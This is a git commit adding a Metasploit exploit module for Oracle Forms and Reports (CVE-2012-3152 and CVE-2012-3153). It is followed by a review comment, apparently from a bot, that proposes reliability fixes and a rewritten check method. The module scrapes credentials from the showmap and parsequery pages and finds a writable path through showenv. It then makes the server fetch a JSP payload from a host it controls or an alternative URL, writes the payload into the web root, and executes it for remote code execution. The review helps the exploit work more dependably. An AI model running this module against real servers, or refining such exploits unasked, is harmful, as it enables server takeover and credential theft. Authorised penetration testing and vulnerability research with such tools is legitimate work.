added module for Oracle Forms and Reports

bug/bundler_fix
Mekanismen 2014-01-30 14:45:17 +01:00
parent de1a29c6fa
commit e7ab77c736
1 changed files with 223 additions and 0 deletions


@ -0,0 +1,223 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
require 'open-uri'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer::HTML
Rank = GreatRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Forms and Reports',
'Description' => %q{
This module enumerates possible vulnerable credentials in the /showmap url. Vulnerable credentials can then be used to query
the /showenv url for a local filepath that is reachable from an URL. A shell can be uploaded to this path using URLPARAMETER.
This allows us to execute arbitrary code on the server. Tested on Linux and Oracle Forms and Reports 11.1.
},
'Author' =>
[
'miss_sudo', # Vulnerability discovery
'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ "CVE", "2012-3152" ],
[ "CVE", "2012-3153" ],
[ "EDB", "31253" ],
[ 'URL', "http://netinfiltration.com" ]
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Linux',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 15 2014'
))
register_options(
[
OptString.new('EXTURL', [false, 'An alternative host to request the payload from', "" ]),
OptString.new('OPTDIR', [false, 'An alternative folder to download payload to', "" ]),
OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
])
end
def check
url = datastore['RHOST']
url = "http://" + url + "/reports/rwservlet/showmap"
uri = URI.parse(url)
begin
html = uri.open.read
rescue
return Exploit::CheckCode::Safe
end
if html =~ /Reports Servlet Key Map/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
@hacked = false
@payload_url = ""
@payload_name = rand_text_alpha(8+rand(8)) + ".jsp"
@payload_dir = ""
@local_path = ""
@pl = payload.encoded
if datastore['OPTDIR'].blank?
@payload_dir = "/examples/"
else
@payload_dir = datastore['OPTDIR']
end
@url = datastore['RHOST']
url = "http://" + @url + "/reports/rwservlet/showmap"
uri = URI.parse(url)
begin
html = uri.open.read
rescue
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
#Parse keymaps for servers
print_status "#{peer} - Enumerating keymaps ... "
uri = target_uri.path
test.each do |t|
if not @hacked
t = t.delete(' ')
res = send_request_cgi({
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
'method' => 'GET',
})
if res and res.code == 200
if res.body =~ /userid=(.*)@/
authid = $1
end
if res.body =~ /server=(\S*)/
server = $1
end
end
if server and authid
getenv(server, authid)
end
end
end
if @hacked
else
print_status "#{peer} - Enumeration done ... no vulnerable keymaps for automatic explotation found"
end
end
def getenv(server, authid)
print_good "#{peer} - Found server: #{server}"
print_good "#{peer} - Found credentials: #{authid}"
print_status "#{peer} - Querying showenv ..."
url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}"
uri = URI.parse(url)
begin
html = uri.open.read
rescue
print_status("#{peer} - Query failed")
else
if html =~ /\\(.*)\\showenv/
print_good "#{peer} - Query succeeded!"
print_status "#{peer} - Windows install detected "
print_status "#{peer} - Uploading payload ..."
@local_path = $1.gsub("\\", "/")
local_server_run()
elsif html =~ /\/(.*)\/showenv/
print_good "#{peer} - Query succeeded!"
print_status "#{peer} - Linux install detected"
print_status "#{peer} - Uploading payload ..."
@local_path = $1
local_server_run()
else
print_status "#{peer} - Query failed"
end
end
end
def primer
@payload_url = get_uri
upload_payload
end
def on_request_uri(cli, request)
if request.uri =~ /#{get_resource}/
send_response(cli, @pl)
end
end
def local_server_run()
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
upload_payload
exec_payload
end
end
def exec_payload
uri = target_uri.path
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
print_status("#{peer} - Executing payload...")
url = "/reports#{@payload_dir}#{@payload_name}"
res = send_request_cgi({
'uri' => normalize_uri(uri, url),
'method' => 'GET'
})
end
def upload_payload()
path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
uri = target_uri.path
res = send_request_cgi({
'uri' => normalize_uri(uri, "/reports/rwservlet"),
'method' => 'GET',
'encode_params' => false,
'vars_get' => {
'report' => 'test.rdf',
'desformat' => 'html',
'destype' => 'file',
'desname' => path,
'JOBTYPE' => 'rwurl',
'URLPARAMETER' => @payload_url
}
})
if res.body =~ /Successfully run/
@hacked = true
print_good "#{peer} - Payload uploaded!"
else
print_status "#{peer} - Payload upload failed"
end
end
end
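Review bot: `check`, the showmap fetch at the top of `exploit`, and the showenv fetch in `getenv` all go through open-uri on a hand-built `"http://" + RHOST + ...` string rather than the HttpClient mixin, so RPORT, SSL, VHOST, proxy and TARGETURI settings in the datastore are not honoured for those three requests while the later `send_request_cgi` calls do honour them, meaning `check` can report Safe simply because port 80 is closed. Routing them through `send_request_cgi` with `normalize_uri(target_uri.path, 'reports', 'rwservlet', 'showmap')` (rewritten `check` below; the other two follow the same shape) also lets `require 'open-uri'` and the bare `rescue` blocks go away. In `getenv` the scraped `server` and `authid` values are interpolated raw into the query string; pass them as `'vars_get' => { 'server' => server, 'authid' => authid }` so they are URL-encoded. `upload_payload` reads `res.body` without checking that `res` is non-nil, so a dropped connection raises NoMethodError instead of a clean failure; add `fail_with(Failure::Unreachable, "#{peer} - No response from rwservlet") unless res` before the match. Minor: `on_request_uri` builds a regex from `get_resource` unescaped, which should be `Regexp.escape(get_resource)` or a plain `start_with?` comparison.
```ruby
def check
  res = send_request_cgi({
    'uri'    => normalize_uri(target_uri.path, 'reports', 'rwservlet', 'showmap'),
    'method' => 'GET'
  })
  # No response at all means we could not reach the servlet, not that it is patched
  return Exploit::CheckCode::Unknown unless res
  if res.code == 200 && res.body =~ /Reports Servlet Key Map/
    return Exploit::CheckCode::Appears
  end
  Exploit::CheckCode::Safe
end
# … unchanged: exploit, getenv, primer, on_request_uri, local_server_run, exec_payload, upload_payload …
```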